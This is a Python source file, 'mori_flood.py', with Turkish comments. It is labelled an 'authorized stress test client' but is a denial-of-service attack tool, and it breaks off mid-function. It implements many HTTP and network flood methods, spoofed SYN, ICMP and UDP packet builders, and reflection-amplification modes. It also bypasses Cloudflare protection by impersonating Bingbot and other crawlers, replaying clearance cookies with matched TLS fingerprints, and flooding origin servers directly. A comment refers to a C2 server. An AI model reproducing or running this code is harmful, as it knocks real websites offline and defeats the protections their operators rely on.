#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ mori_flood.py — authorized stress test client Requires: python3 (stdlib only). Optional: pip install requests cloudscraper Usage: python3 mori_flood.py target : http://example.com:80/ veya 1.2.3.4:80 (L4 için) method : aşağıdan seç duration : saniye threads : thread sayısı L7 Methods : GET POST HEAD PPS NULL OVH STRESS COOKIES APACHE XMLRPC DYN GSB RHEX STOMP BOT SLOW AVB CFB BYPASS EVEN DOWNLOADER STATICHTTP CF_BYPASS RAPID_RESET TLS_SPOOF KILLER UAM_BYPASS WEBSOCKET_KILLER NGINX_KILLER WORDPRESS_KILLER L4 Methods : UDP TCP SYN ICMP CPS CONNECTION VSE TS3 MCPE FIVEM DISCORD MEGA_UDP AMP Methods : RDP CLDAP MEM CHAR NTP DNS ARD (root + reflectors arg gerekir) Örnekler: python3 mori_flood.py http://example.com/ GET 60 100 python3 mori_flood.py 1.2.3.4:80 UDP 60 200 python3 mori_flood.py 1.2.3.4:53 DNS 30 50 8.8.8.8,8.8.4.4 """ import os, sys, random, socket, ssl, struct, threading, time from contextlib import suppress from itertools import cycle from threading import Thread, Event from urllib.parse import quote, urlparse # ── opsiyonel ───────────────────────────────────────────────────────────────── try: from cloudscraper import create_scraper; HAS_CS = True except: HAS_CS = False try: from requests import Session as RS; HAS_REQ = True except: HAS_REQ = False try: import impacket.ImpactPacket as IMP; HAS_IMP = True except: HAS_IMP = False # ── global ───────────────────────────────────────────────────────────────────── _stop = Event() _lock = threading.Lock() SENT = [0] BYTES = [0] _UAM_COOKIE_STR = "" # set by main() when method=UAM_BYPASS UA = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Android 13; Mobile; rv:121.0) Gecko/121.0 Firefox/121.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/74.0.3729.169 Safari/537.36", "Googlebot/2.1 (+http://www.google.com/bot.html)", "AdsBot-Google (+http://www.google.com/adsbot.html)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", ] GBOT = [u for u in UA if "ooglebot" in u or "AdsBot" in u] REF = [ "https://www.google.com/search?q=", "https://www.bing.com/search?q=", "https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=", "https://www.facebook.com/sharer/sharer.php?u=", "https://drive.google.com/viewerng/viewer?url=", "https://www.google.com/translate?u=", "https://duckduckgo.com/?q=", "https://t.co/", ] def rstr(n=8): return ''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=n)) def rip(): return '.'.join(str(random.randint(1,254)) for _ in range(4)) def rua(): return random.choice(UA) def rref(h): return random.choice(REF) + quote(h) def rint(a,b): return random.randint(a,b) # ── kaynak izleme ────────────────────────────────────────────────────────────── def cpu(): try: import psutil; return psutil.cpu_percent(interval=0.3) except: pass if os.path.exists('/proc/stat'): def _r(): with open('/proc/stat') as f: p=f.readline().split() return sum(int(x) for x in p[1:]), int(p[4]) t1,i1=_r(); time.sleep(0.3); t2,i2=_r() d=t2-t1; return 100*(1-(i2-i1)/d) if d else 0 return 0 def ram(): try: import psutil; return psutil.virtual_memory().percent except: pass if os.path.exists('/proc/meminfo'): d={} with open('/proc/meminfo') as f: for l in f: k,v=l.split(':'); d[k.strip()]=int(v.strip().split()[0]) t=d.get('MemTotal',1); return 100*(1-d.get('MemAvailable',t)/t) return 0 def guard(mx_cpu=80, mx_ram=75): """Sadece uyarı verir, durdurmaz. Süre zorunludur.""" while not _stop.is_set(): time.sleep(5) c,r=cpu(),ram() if c>mx_cpu or r>mx_ram: print(f"\033[93m[WARN] CPU={c:.0f}% RAM={r:.0f}% — yüksek kaynak kullanımı\033[0m", flush=True) # ── soket yardımcıları ───────────────────────────────────────────────────────── def mksock(host, port, tls=False, to=4): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.settimeout(to); s.connect((host, port)) if tls: ctx=ssl.create_default_context() ctx.check_hostname=False; ctx.verify_mode=ssl.CERT_NONE s=ctx.wrap_socket(s, server_hostname=host) return s def send(s, d): try: b=d if isinstance(d,bytes) else d.encode() s.sendall(b) with _lock: SENT[0]+=1; BYTES[0]+=len(b) return True except: return False def sndto(s, d, a): try: s.sendto(d, a) with _lock: SENT[0]+=1; BYTES[0]+=len(d) return True except: return False def close(s): with suppress(Exception): if s: s.close() # ── raw paket oluşturucular ──────────────────────────────────────────────────── def mk_syn(sip, dip, dport): if HAS_IMP: ip=IMP.IP(); ip.set_ip_src(sip); ip.set_ip_dst(dip) t=IMP.TCP(); t.set_SYN(); t.set_th_flags(0x02) t.set_th_dport(dport); t.set_th_sport(rint(32768,65535)) ip.contains(t); return ip.get_packet() s=socket.inet_aton(sip); d=socket.inet_aton(dip); sp=rint(1024,65535) ih=struct.pack('!BBHHHBBH4s4s',0x45,0,40,rint(0,65535),0,64,socket.IPPROTO_TCP,0,s,d) th=struct.pack('!HHIIBHHH',sp,dport,0,0,0x50,0x02,64240,0,0) return ih+th def mk_icmp(sip, dip): if HAS_IMP: ip=IMP.IP(); ip.set_ip_src(sip); ip.set_ip_dst(dip) ic=IMP.ICMP(); ic.set_icmp_type(ic.ICMP_ECHO) ic.contains(IMP.Data(b'A'*rint(16,512))); ip.contains(ic); return ip.get_packet() pl=os.urandom(rint(16,512)) h=struct.pack('bbHHh',8,0,0,rint(0,65535),1); dt=h+pl cs=0 for i in range(0,len(dt),2): w=dt[i:i+2] if len(w)==2: cs+=struct.unpack('H',w)[0] cs=~((cs>>16)+(cs&0xffff))&0xffff return struct.pack('bbHHh',8,0,cs,rint(0,65535),1)+pl def mk_amp(sip, dip, dport, payload): if HAS_IMP: ip=IMP.IP(); ip.set_ip_src(sip); ip.set_ip_dst(dip) u=IMP.UDP(); u.set_uh_sport(rint(1024,65535)); u.set_uh_dport(dport) u.contains(IMP.Data(payload)); ip.contains(u); return ip.get_packet() s=socket.inet_aton(sip); d=socket.inet_aton(dip) ud=struct.pack('!HHHH',rint(1024,65535),dport,8+len(payload),0)+payload ih=struct.pack('!BBHHHBBH4s4s',0x45,0,20+len(ud),rint(0,65535),0,64,socket.IPPROTO_UDP,0,s,d) return ih+ud def mk_discord(sip, dip, dport): if HAS_IMP: ip=IMP.IP(); ip.set_ip_src(sip); ip.set_ip_dst(dip) u=IMP.UDP(); u.set_uh_sport(rint(32768,65535)); u.set_uh_dport(dport) pl=b'\x13\x37\xca\xfe\x01\x00\x00\x00\x13\x37\xca\xfe\x01\x00\x00\x00\x13\x37\xca\xfe\x01\x00\x00\x00' pl+=bytes([rint(0,255) for _ in range(4)]) u.contains(IMP.Data(pl)); ip.contains(u); return ip.get_packet() # impacket yoksa raw UDP (root gerekir) sip_b=socket.inet_aton(sip); dip_b=socket.inet_aton(dip) pl=b'\x13\x37\xca\xfe\x01\x00\x00\x00'*3+bytes([rint(0,255) for _ in range(4)]) sp=rint(32768,65535) ud=struct.pack('!HHHH',sp,dport,8+len(pl),0)+pl ih=struct.pack('!BBHHHBBH4s4s',0x45,0,20+len(ud),rint(0,65535),0,64,socket.IPPROTO_UDP,0,sip_b,dip_b) return ih+ud # ── HTTP yük üretici ─────────────────────────────────────────────────────────── class Target: def __init__(self, url): u=urlparse(url if '://' in url else 'http://'+url) self.scheme=u.scheme or 'http' self.host=u.hostname or url self.port=u.port or (443 if self.scheme=='https' else 80) self.path=(u.path or '/')+('?'+u.query if u.query else '') self.auth=f'{self.host}:{self.port}' self.tls=self.scheme=='https' def spoof(self): sp=rip() return (f"X-Forwarded-Proto: Http\r\nX-Forwarded-Host: {self.host}, 1.1.1.1\r\n" f"Via: {sp}\r\nClient-IP: {sp}\r\nX-Forwarded-For: {sp}\r\nReal-IP: {sp}\r\n") def rh(self): return f"User-Agent: {rua()}\r\nReferrer: {rref(self.host)}\r\n"+self.spoof() def base(self, m='GET', p=None, v=None): pth=p or self.path; ver=v or random.choice(['1.0','1.1','1.2']) return (f"{m} {pth} HTTP/{ver}\r\nHost: {self.auth}\r\n" "Accept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\n" "Cache-Control: max-age=0\r\nConnection: keep-alive\r\n" "Sec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\n" "Sec-Fetch-Site: none\r\nSec-Fetch-User: ?1\r\n" "Sec-Gpc: 1\r\nPragma: no-cache\r\nUpgrade-Insecure-Requests: 1\r\n") def GET(self, p=None): return (self.base('GET',p)+self.rh()+"\r\n").encode() def HEAD(self, p=None): return (self.base('HEAD',p)+self.rh()+"\r\n").encode() def PPS(self): return f"GET {self.path} HTTP/1.1\r\nHost: {self.host}\r\n\r\n".encode() def UAM(self, cookie_str): # Browser-grade headers — CF UAM için sıra ve alan adı önemli ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" return (f"GET {self.path} HTTP/1.1\r\n" f"Host: {self.host}\r\n" f"Connection: keep-alive\r\n" f"Cache-Control: max-age=0\r\n" f"sec-ch-ua: \"Chromium\";v=\"124\", \"Google Chrome\";v=\"124\", \"Not-A.Brand\";v=\"99\"\r\n" f"sec-ch-ua-mobile: ?0\r\n" f"sec-ch-ua-platform: \"Windows\"\r\n" f"Upgrade-Insecure-Requests: 1\r\n" f"User-Agent: {ua}\r\n" f"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\r\n" f"Sec-Fetch-Site: none\r\n" f"Sec-Fetch-Mode: navigate\r\n" f"Sec-Fetch-User: ?1\r\n" f"Sec-Fetch-Dest: document\r\n" f"Accept-Encoding: gzip, deflate, br\r\n" f"Accept-Language: en-US,en;q=0.9\r\n" f"Cookie: {cookie_str}\r\n\r\n").encode() def POST(self, body=None, ct='application/json'): b=body or f'{{"data":"{rstr(32)}"}}' return (self.base('POST')+self.rh()+ f"Content-Type: {ct}\r\nContent-Length: {len(b)}\r\n" f"X-Requested-With: XMLHttpRequest\r\n\r\n{b}").encode() def conn(self, to=4): return mksock(self.host, self.port, self.tls, to) # ══════════════════════════════════════════════════════════════════════════════ # L7 METOTLARI # ══════════════════════════════════════════════════════════════════════════════ # Her worker kendi içinde loop yapar — bağlantı kopunca anında yeniden bağlanır, # launcher spawn boşluğu olmaz → sabit yüksek RPS def w_GET(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(); pl=t.GET() for _ in range(rpc): if _stop.is_set() or not send(s,pl): break close(s) def w_POST(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() for _ in range(rpc): if _stop.is_set() or not send(s, t.POST()): break close(s) def w_HEAD(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(); pl=t.HEAD() for _ in range(rpc): if _stop.is_set() or not send(s,pl): break close(s) def w_PPS(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(); pl=t.PPS() for _ in range(rpc): if _stop.is_set() or not send(s,pl): break close(s) def w_NULL(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() pl=(t.base('GET')+t.spoof()+"User-Agent: null\r\nReferrer: null\r\n\r\n").encode() for _ in range(rpc): if _stop.is_set() or not send(s,pl): break close(s) def w_OVH(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(); pl=t.GET() for _ in range(min(rpc,5)): if _stop.is_set() or not send(s,pl): break close(s) def w_STRESS(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() for _ in range(rpc): if _stop.is_set(): break if not send(s, t.POST(f'{{"data":"{rstr(512)}"}}')): break close(s) def w_COOKIES(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() ck=f"_ga=GA{rint(1000,99999)};_gat=1;__cfduid=dc{rstr(32)};{rstr(6)}={rstr(32)}\r\n" pl=(t.base('GET')+t.rh()+f"Cookie: {ck}\r\n").encode() for _ in range(rpc): if _stop.is_set() or not send(s,pl): break close(s) def w_APACHE(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() rng="bytes=0-,"+",".join(f"5-{i}" for i in range(1,1024)) pl=(t.base('GET')+t.rh()+f"Range: {rng}\r\n\r\n").encode() for _ in range(rpc): if _stop.is_set() or not send(s,pl): break close(s) def w_XMLRPC(t, rpc): while not _stop.is_set(): with suppress(Exception): body=(f"" f"pingback.ping" f"{rstr(64)}" f"{rstr(64)}" f"") s=t.conn() for _ in range(rpc): if _stop.is_set() or not send(s, t.POST(body,'application/xml')): break close(s) def w_DYN(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() for _ in range(rpc): if _stop.is_set(): break pl=(t.base('GET')+t.spoof()+ f"User-Agent: {rua()}\r\nHost: {rstr(6)}.{t.host}:{t.port}\r\n\r\n").encode() if not send(s,pl): break close(s) def w_GSB(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() for _ in range(rpc): if _stop.is_set(): break pl=(t.base('HEAD',f"{t.path}?qs={rstr(6)}&{rstr(4)}={rstr(8)}")+ t.rh()+"Connection: Keep-Alive\r\n\r\n").encode() if not send(s,pl): break close(s) def w_RHEX(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn() for _ in range(rpc): if _stop.is_set(): break hx=os.urandom(random.choice([32,64,128])).hex() pl=(f"GET {t.path}/{hx} HTTP/1.1\r\nHost: {t.auth}/{hx}\r\n" +t.rh()+"Accept-Encoding: gzip,deflate,br\r\nConnection: keep-alive\r\n\r\n").encode() if not send(s,pl): break close(s) def w_STOMP(t, rpc): hx=(r'\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA')*22+' ' dep="Accept-Encoding: gzip,deflate,br\r\nConnection: keep-alive\r\nPragma: no-cache\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" while not _stop.is_set(): with suppress(Exception): p1=(f"GET {t.path}/{hx} HTTP/1.1\r\nHost: {t.auth}/{hx}\r\n"+t.rh()+dep).encode() p2=(f"GET {t.path}/cdn-cgi/l/chk_captcha HTTP/1.1\r\nHost: {hx}\r\n"+t.rh()+dep).encode() s=t.conn(); send(s,p1) for _ in range(rpc): if _stop.is_set() or not send(s,p2): break close(s) def w_BOT(t, rpc): while not _stop.is_set(): with suppress(Exception): ua=random.choice(GBOT) if GBOT else rua() p1=(f"GET /robots.txt HTTP/1.1\r\nHost: {t.auth}\r\n" f"Connection: Keep-Alive\r\nAccept: text/plain,*/*\r\n" f"User-Agent: {ua}\r\nAccept-Encoding: gzip,deflate,br\r\n\r\n").encode() p2=(f"GET /sitemap.xml HTTP/1.1\r\nHost: {t.auth}\r\n" f"Connection: Keep-Alive\r\nAccept: */*\r\nFrom: googlebot(at)googlebot.com\r\n" f"User-Agent: {ua}\r\nAccept-Encoding: gzip,deflate,br\r\n" f"If-None-Match: {rstr(9)}-{rstr(4)}\r\n" f"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n").encode() s=t.conn(); send(s,p1); send(s,p2) pl=t.GET() for _ in range(rpc): if _stop.is_set() or not send(s,pl): break close(s) def w_SLOW(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(60); send(s, t.GET()) for _ in range(rpc): if _stop.is_set(): break time.sleep(random.uniform(0.5,2.0)) if not send(s, f"X-a: {rint(1,9999)}\r\n".encode()): break close(s) def w_AVB(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(); pl=t.GET() for _ in range(rpc): if _stop.is_set(): break time.sleep(max(rpc/1000,1)) if not send(s,pl): break close(s) def w_CFB(t, rpc): url=f"{t.scheme}://{t.auth}{t.path}" while not _stop.is_set(): if HAS_CS: with suppress(Exception), create_scraper() as s: for _ in range(rpc): if _stop.is_set(): break with suppress(Exception): s.get(url); SENT[0]+=1 else: import urllib.request ctx2=ssl.create_default_context(); ctx2.check_hostname=False; ctx2.verify_mode=ssl.CERT_NONE req=urllib.request.Request(url, headers={"User-Agent": rua()}) for _ in range(rpc): if _stop.is_set(): break with suppress(Exception): urllib.request.urlopen(req,timeout=5,context=ctx2); SENT[0]+=1 def w_BYPASS(t, rpc): url=f"{t.scheme}://{t.auth}{t.path}" while not _stop.is_set(): if HAS_REQ: with suppress(Exception), RS() as s: for _ in range(rpc): if _stop.is_set(): break with suppress(Exception): s.get(url,headers={"User-Agent":rua()},timeout=5,verify=False); SENT[0]+=1 else: w_CFB(t, rpc); break def w_EVEN(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(10); pl=t.GET() while not _stop.is_set(): if not send(s,pl): break try: s.recv(512) except: break close(s) def w_DOWNLOADER(t, rpc): while not _stop.is_set(): with suppress(Exception): s=t.conn(30); pl=t.GET() for _ in range(rpc): if _stop.is_set(): break send(s,pl) while not _stop.is_set(): time.sleep(0.01) if not s.recv(1): break close(s) def _fill_jar(jar, host, cookie_str): """Cookie string'i (k=v; k2=v2) CookieJar'a doldur — cf_clearance dahil.""" import http.cookiejar as hcj for pair in (cookie_str or '').split(';'): pair = pair.strip() if '=' not in pair: continue name, value = pair.split('=', 1) jar.set_cookie(hcj.Cookie( version=0, name=name.strip(), value=value.strip(), port=None, port_specified=False, domain=host, domain_specified=True, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={}, )) def _detect_browser(cookie_str='', ua_str=''): """UA veya cookie string'den tarayıcı profilini tahmin et (chrome/firefox). JA3 eşleşmesi için cf_clearance'ı alan cihazın profilini seçmek kritik.""" haystack = (cookie_str + ' ' + ua_str).lower() if 'firefox' in haystack or '; rv:' in haystack: return 'firefox' return 'chrome' def _flood_origin(t, rpc, origin_ips, ck, ck_dict, browser='chrome'): """ Origin IP listesine round-robin flood — Host header = asıl domain. JA3 tekniği: _mk_ssl(browser) ile browser TLS el sıkışması + SNI = domain. CF proxy devre dışı; sadece origin sunucuya ulaşılır. """ from itertools import cycle as _cycle ip_cyc = _cycle(origin_ips) ctx = _mk_ssl(browser) while not _stop.is_set(): with suppress(Exception): ip = next(ip_cyc) pkt = t.UAM(ck) if t.tls: raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM) raw.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) raw.settimeout(4) raw.connect((ip, t.port)) # server_hostname = domain (SNI), IP'ye bağlanıyoruz s = ctx.wrap_socket(raw, server_hostname=t.host) else: orig = Target(f"{t.scheme}://{ip}{t.path}") s = orig.conn() for _ in range(rpc): if _stop.is_set() or not send(s, pkt): break close(s) def _flood_cf(t, rpc, url, ck, ck_dict, browser='chrome'): """ CF üzerinden JA3-matching flood (stdlib only, harici bağımlılık yok). Teknik (kullanıcının kişisinden alınan yöntem): cf_clearance cookie'yi aldığı cihazın TLS parmak izi (JA3) + header seti birebir simüle edilir. CF parmak izi %100 uyuşunca aynı kullanıcı ama IP değişmiş muamelesi görür → mobil IP rotasyonu toleransı devreye girer. _mk_opener(browser, jar): • SSLContext → browser cipher suite sırası (JA3'ün asıl belirleyicisi) • set_ecdh_curve('prime256v1') → ECDH grubu eşleşmesi • addheaders → browser header sırası (stealth.py'den alınan _BP['order']) """ import http.cookiejar as hcj while not _stop.is_set(): with suppress(Exception): jar = hcj.CookieJar() _fill_jar(jar, t.host, ck) # cf_clearance + diğer cookie'ler opener = _mk_opener(browser, jar) for _ in range(rpc): if _stop.is_set(): break with suppress(Exception): r = opener.open(url, timeout=8) d = r.read() with _lock: SENT[0] += 1; BYTES[0] += len(d) _UAM_ORIGIN_IPS = [] # C2 sunucusu tarafından doldurulur (argv[10]) # ── CF_UAM_BOT_BYPASS — Bot crawler simülasyonu ile CF IUAM bypass ────────────── # CF Bot Management'ın "Verified Bot" whitelist'i: Bingbot, DuckDuckBot, YandexBot # gibi botlar CF'nin IUAM challenge'ını almaz (robots.txt content signal + rDNS). # Teknik: gerçek bot UA + crawler davranış sırası (robots.txt → sitemap → hedef) # + bot'a özgü header seti → CF bot analiz katmanını kandır. # NOT: cf_clearance cookie'si GEREKMEZ — bot kimliği challenge'ı atlatır. # Bingbot/YandexBot: rDNS doğrulaması Googlebot kadar sıkı değil → klonlanabilir. _BOT_PROFILES = [ { 'name': 'Bingbot', 'ua': 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'from': 'bingbot@microsoft.com', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept_lang': 'en-US,en;q=0.5', }, { 'name': 'DuckDuckBot', 'ua': 'DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)', 'from': 'duckduckbot@duckduckgo.com', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept_lang': 'en-US,en;q=0.5', }, { 'name': 'YandexBot', 'ua': 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'from': 'robot@yandex.ru', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept_lang': 'ru,en;q=0.7', }, { 'name': 'Baiduspider', 'ua': 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'from': 'spider@baidu.com', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept_lang': 'zh-CN,zh;q=0.9,en;q=0.3', }, { 'name': 'AhrefsBot', 'ua': 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'from': 'support@ahrefs.com', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept_lang': 'en-US,en;q=0.5', }, { 'name': 'SemrushBot', 'ua': 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'from': '', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept_lang': 'en-US,en;q=0.5', }, { 'name': 'facebookexternalhit', 'ua': 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)', 'from': '', 'accept': 'text/html', 'accept_lang': 'en', }, { 'name': 'Twitterbot', 'ua': 'Twitterbot/1.0', 'from': '', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept_lang': 'en-US,en;q=0.5', }, ] def _mk_bot_opener(prof, jar): """Bot UA + crawler header seti ile opener oluştur (TLS fingerprint önemsiz).""" import urllib.request as _ureq, ssl as _ssl ctx = _ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = _ssl.CERT_NONE handler = _ureq.HTTPSHandler(context=ctx) ck_handler = _ureq.HTTPCookieProcessor(jar) opener = _ureq.build_opener(handler, ck_handler) headers = [ ('User-Agent', prof['ua']), ('Accept', prof['accept']), ('Accept-Language', prof['accept_lang']), ('Accept-Encoding', 'gzip, deflate, br'), ('Connection', 'keep-alive'), ] if prof.get('from'): headers.append(('From', prof['from'])) opener.addheaders = headers return opener def _flood_bot(t, rpc, url): """ Bot crawler davranış simülasyonu: 1. /robots.txt → CF bot analiz katmanına "gerçek crawler" sinyali gönder 2. %60 ihtimalle /sitemap.xml → gezinti derinliği simülasyonu 3. Ana hedef flood → IUAM challenge almadan L7 yük Her thread farklı bot profili kullanır (profil rotasyonu). """ import http.cookiejar as hcj, random as _rnd, time as _tm base_url = f"{t.scheme}://{t.host}" while not _stop.is_set(): with suppress(Exception): prof = _rnd.choice(_BOT_PROFILES) jar = hcj.CookieJar() opener = _mk_bot_opener(prof, jar) # Warm-up: robots.txt (CF'ye bot kimliğini kanıtla) with suppress(Exception): opener.open(f"{base_url}/robots.txt", timeout=6).read() _tm.sleep(_rnd.uniform(0.3, 0.9)) # %60 ihtimalle sitemap.xml (crawler davranış derinliği) if _rnd.random() < 0.6: with suppress(Exception): opener.open(f"{base_url}/sitemap.xml", timeout=6).read() _tm.sleep(_rnd.uniform(0.1, 0.5)) # Ana hedef flood for _ in range(rpc): if _stop.is_set(): break with suppress(Exception): r = opener.open(url, timeout=8) d = r.read() with _lock: SENT[0] += 1; BYTES[0] += len(d) def w_CF_UAM_BOT_BYPASS(t, rpc): """ CF IUAM bypass — Verified Bot kimliği simülasyonu. Cookie veya origin IP gerektirmez. CF Bot Management whitelist'indeki crawler UA'ları + davranış kalıbı: robots.txt fetch → sitemap fetch → asıl hedef flood Profil rotasyonu: her thread farklı bot (Bingbot/Yandex/DuckDuck/Baidu/Ahrefs...) """ url = f"{t.scheme}://{t.auth}{t.path}" bot_names = ', '.join(p['name'] for p in _BOT_PROFILES) print(f"\033[96m[BOT_BYPASS] {len(_BOT_PROFILES)} bot profili rotasyonu: {bot_names}\033[0m", flush=True) print(f"\033[96m[BOT_BYPASS] robots.txt → sitemap warm-up → {url}\033[0m", flush=True) _flood_bot(t, rpc, url) def w_UAM_BYPASS(t, rpc): """ CF UAM bypass — JA3/header fingerprint eşleşme tekniği. • _UAM_ORIGIN_IPS doluysa → direkt origin flood (CF tamamen atlatıldı) browser TLS cipher suite ile SNI bağlantı • cookie varsa → JA3-matching CF flood (IP mismatch tolerance) cookie'yi alan cihazın cipher suite + header order """ ck = _UAM_COOKIE_STR url = f"{t.scheme}://{t.auth}{t.path}" ck_dict = {} for pair in ck.split(';'): pair = pair.strip() if '=' in pair: k, v = pair.split('=', 1) ck_dict[k.strip()] = v.strip() # cf_clearance'ı alan cihazın tarayıcı profilini tespit et browser = _detect_browser(ck) if _UAM_ORIGIN_IPS: print(f"\033[92m[UAM] Origin IP modu — {len(_UAM_ORIGIN_IPS)} IP, {browser} JA3, CF proxy atlatıldı\033[0m", flush=True) _flood_origin(t, rpc, _UAM_ORIGIN_IPS, ck, ck_dict, browser) elif ck: print(f"\033[93m[UAM] JA3-match cookie bypass — {browser} cipher suite + header order, CF üzerinden\033[0m", flush=True) _flood_cf(t, rpc, url, ck, ck_dict, browser) else: print(f"\033[91m[UAM] Ne origin IP ne cookie var — durduruluyor\033[0m", flush=True) # Static resource flood — Cloudflare cache bypass + static site exhaustion # Hedef: CDN/CF arkasındaki statik siteler (bet perdesi, reklam, affiliate, landing) # Teknik: cache-busting params → CDN miss → origin'i döver # + ETag mismatch → her seferinde tam cevap zorunlu # + path rotation → WAF'ın statik path whitelist'ini tam kapsar _STATIC_PATHS = [ # Evrensel '/favicon.ico','/robots.txt','/sitemap.xml','/sitemap_index.xml', '/ads.txt','/app-ads.txt','/security.txt','/.well-known/security.txt', # CSS/JS '/assets/css/main.css','/assets/css/app.css','/assets/css/style.css', '/assets/js/app.js','/assets/js/main.js','/assets/js/bundle.js', '/static/css/style.css','/static/js/main.js','/static/js/vendor.js', '/css/bootstrap.min.css','/css/style.css','/js/jquery.min.js', '/js/bootstrap.min.js','/js/app.js', # WP static '/wp-includes/js/jquery/jquery.min.js', '/wp-includes/css/dist/block-library/style.min.css', '/wp-content/themes/generatepress/style.css', '/wp-content/themes/astra/style.css', '/wp-content/themes/hello-elementor/style.css', # Bet/affiliate spesifik '/live','/sports','/casino','/slots','/betting','/promotions','/bonuses', '/en/sports','/tr/sports','/en/casino','/tr/casino', # Image/font '/images/logo.png','/images/banner.jpg','/img/bg.jpg','/img/logo.svg', '/fonts/roboto.woff2','/fonts/opensans.woff2', # CDN ve CF '/cdn-cgi/rum','/cdn-cgi/challenge-platform/h/g/orchestrate/managed/v1', '/wp-json/wp/v2/posts', ] _ACCEPT_MAP = { 'css': 'text/css,*/*;q=0.1', 'js': 'application/javascript,*/*;q=0.1', 'png': 'image/webp,image/apng,image/*,*/*;q=0.8', 'jpg': 'image/webp,image/apng,image/*,*/*;q=0.8', 'svg': 'image/svg+xml,image/*,*/*;q=0.8', 'ico': 'image/x-icon,image/*,*/*;q=0.5', 'woff2':'font/woff2,font/*,*/*;q=0.7', 'woff': 'font/woff,font/*,*/*;q=0.7', 'xml': 'application/xml,text/xml,*/*;q=0.9', 'txt': 'text/plain,*/*;q=0.9', 'json':'application/json,*/*;q=0.9', } def w_STATICHTTP(t, rpc): """ Statik içerik flood: cache-busting + ETag mismatch + path rotation. CF/nginx cache'ini bypass ederek origin'e max baskı uygular. Statik site + CDN korumalı bet perdesi için tasarlandı. """ while not _stop.is_set(): with suppress(Exception): s = t.conn() for _ in range(rpc): if _stop.is_set(): break path = random.choice(_STATIC_PATHS) ext = path.rsplit('.', 1)[-1].lower() if '.' in path.split('/')[-1] else '' acc = _ACCEPT_MAP.get(ext, 'text/html,application/xhtml+xml,*/*;q=0.9') ip = rip() # Cache buster: her istek farklı URL → CDN miss → origin vurulur bust = f"?v={rstr(10)}&_={rint(100000000,999999999)}" # ETag mismatch: sunucuyu tam cevap vermeye zorlar etag = f'W/"{rstr(8)}-{rint(1000,9999)}"' pl = ( f"GET {path}{bust} HTTP/1.1\r\n" f"Host: {t.auth}\r\n" f"Accept: {acc}\r\n" f"Accept-Encoding: gzip, deflate, br\r\n" f"Accept-Language: en-US,en;q=0.9,tr;q=0.8\r\n" f"Cache-Control: no-cache, no-store, must-revalidate\r\n" f"Pragma: no-cache\r\n" f"Connection: keep-alive\r\n" f"User-Agent: {rua()}\r\n" f"Referer: {t.scheme}://{t.host}/\r\n" 